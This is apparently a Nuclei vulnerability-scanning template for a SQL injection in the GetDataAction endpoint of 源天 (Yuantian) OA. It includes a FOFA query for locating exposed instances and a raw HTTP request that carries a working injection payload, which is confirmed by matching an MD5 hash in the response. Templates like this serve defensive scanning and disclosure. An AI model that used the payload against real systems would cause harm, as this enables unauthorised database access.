id: yuantian-GetDataAction-sqli
info:
  name: 源天 OA GetDataAction - sqli
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://github.com/OracleNep/Nday-Exploit-Plan/blob/main/CNVD/%E6%BA%90%E5%A4%A9OA%20GetDataAction%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/README.md
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: body="/vmain/login.jsp"
  tags: 2024,yuantian,oa,sqli

http:
  - raw:
      - |
        GET /ServiceAction/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=-1%27%20OR%207063%20IN%20(SELECT%20(sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271%27))))%20AND%20%27a%27=%27a HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br, zstd
        Connection: keep-alive
        Cookie: JSESSIONID=0AA032F961807726B4ADB13519A8CEB2
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Priority: u=0, i
        
    matchers:
      - type: dsl
        dsl:
          - contains(body,'0xc4ca4238a0b923820dcc509a6f75849b')
        condition: and